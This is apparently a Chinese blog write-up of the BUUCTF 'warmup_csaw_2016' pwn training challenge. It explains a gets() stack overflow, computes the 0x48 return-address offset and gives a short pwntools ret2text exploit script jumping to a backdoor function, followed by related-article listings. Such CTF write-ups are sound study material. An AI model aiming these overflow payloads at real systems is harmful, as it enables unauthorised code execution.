[每日一PWN]BUUCTF warmup_csaw_2016

最新推荐文章于 2024-02-04 21:20:07 发布
最新推荐文章于 2024-02-04 21:20:07 发布
阅读量366 收藏 1
点赞数
分类专栏: 每日一PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55233040/article/details/127955044
版权

warmup_csaw_2016

前言

和第一题RIP一样,是经典而基础的ret2text

保护模式

checksec看一下文件保护:
在这里插入图片描述
64位小端序文件,其余没什么需要注意的。

溢出点

放进IDA,可以发现溢出点就在主函数当中
在这里插入图片描述

偏移计算

由IDA分析得,gets函数向v5输入数据,因为gets不限制长度,所以构成溢出,这里的rbp-40h表示输入点距离rbp寄存器的偏移为40h,而同时rbp自己还要占用8个偏移,因此从输入点到返回地址的偏移为40h+8h=48h。
当然不放心也可以用pwndbg算算,步骤和rip中的步骤相同。

后门函数

和rip一样的,这道题的后门函数也是事先写好在文件内部的,可以很轻松的找到
在这里插入图片描述
同上一题,这里也可以获取后门函数的地址
在这里插入图片描述

攻击脚本

由上面所得数据,写出如下脚本:

from pwn import *
p= remote('IP', PORT)
payload = b'a'*(0x40+0x8)+p64(0x40060D)
p.sendline(payload) 
p.interactive()
悸动战士cosmos
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
warmup_csaw_2016
weixin_56301399的博客
07-20 1322
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 436
buuctf pwn
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1272
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 988
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 435
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 434
64位的linux文件。
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1633
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 309
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 760
BUUCTF web题目之WarmUp
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Pwn | CTF】BUUCTF warmup_csaw_2016
最新发布
weixin_46301214的博客
02-04 403
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
buuoj warmup_csaw_2016 writeup
m0_73605862的博客
05-28 127
Step3:查看main函数的伪代码(F5,如果被占用,就用Fn+F5),发现有一个gets函数,猜测是栈溢出,栈的大小是64个字节,但是v5的长度位0x48(0x48+0x08)。【来源】(buuoj)https://buuoj.cn/challenges#warmup_csaw_2016。Step1:checksec指令查看,发现是一个没有任何保护的64位的程序。Step2:将程序放到IDApro下进行静态分析。【题目】warmup_csaw_2016。Step4:编写exp,得到flag。
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 110
BUUCTF 做题练习
buuctf WarmUp
m0_63883187的博客
01-10 60
WarmUp
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值